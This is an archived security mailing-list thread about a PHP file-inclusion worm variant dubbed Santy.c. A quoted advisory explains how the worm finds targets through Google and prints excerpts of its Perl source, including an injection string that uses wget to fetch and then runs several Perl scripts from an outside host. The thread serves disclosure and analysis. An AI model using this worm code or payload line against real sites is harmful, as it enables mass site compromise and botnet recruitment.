<<< Date Index >>>     <<< Thread Index >>>

Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )



In-Reply-To: <Pine.LNX.4.58.0412251805110.19888@xxxxxxxxxxxxxxxx>

The kids are exploiting the php file inclusion (programming flaw), 
well-thought-out.

Thousands of vulnerable sites and potentially thousands of zombies...

We labelled this Santy.c (even if the only similarity with Santy lies in "using 
search engines").

http://www.k-otik.com/exploits/20041225.SantyC.php
http://www.k-otik.com/exploits/20041225.SantyB.php

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com 


>From: Juergen Schmidt <ju@xxxxxxxxx>
>
>Hello,
>
>the new santy version not only attacks phpBB.
>
>It uses the brasilian Google site to find all kinds of PHP skripts.
>It parses their URLs and overwrites variables with strings like:
>
>'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;...
>
>Often enough this leads to download and execution of code.
>On success the worm connects to an IRC server, where already more than 700
>zombies are waiting for commands.
>
>The relevant code:
>---------
>$procura = 'inurl:*.php?*=' . $numr;
>
>for($n=0;$n<900;$n += 10){
>$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort =>
>80, Proto => "tcp") or next;
>print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
>...
>
>$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
>www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget
>www.visualcod
>ers.net/php.txt;wget www.visualcoders.net/ownz.txt;wget
>www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl
>ownz.txt;perl php.txt';
>$t =0;
>$y =0;
>@ja;
>open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
>while (<opa>)
>{
> $ja[$t] = $_;
> chomp $ja[$t];
> $t++;
> $y++;
>}
>close(opa);
>$t=1;
>while ($t < $y)
>   {
>    if ($ja[$t] =~/=/)
>      {
>       $num = rindex $ja[$t], '=';
>       $num += 1;
>       $ja[$t] = substr($ja[$t],0,$num);
>            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
>            print jaera "$ja[$t]$lista1\n";
>            close(jaera);
>        $num = index $ja[$t], '=';
>        $num += 1;
>        $ja[$t] = substr($ja[$t],0,$num);
>        $num1 = rindex $ja[$t], '.';
>        $subproc = substr($ja[$t],$num1,$num);
>
>            open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
>caxe1.txt";
>            print jaera "$ja[$t]$lista1\n";
>            close(jaera);
>      }
>     $t++;
>     }
>
>
>bye, ju
>
>-- 
>Juergen Schmidt       Chefredakteur  heise Security     www.heisec.de
>Heise Zeitschriften Verlag,    Helstorferstr. 7,       D-30625 Hannover
>Tel. +49 511 5352 300      FAX +49 511 5352 417       EMail ju@xxxxxxxxx
>GPG-Key: 0x38EA4970,  5D7B 476D 84D5 94FF E7C5  67BE F895 0A18 38EA 4970
>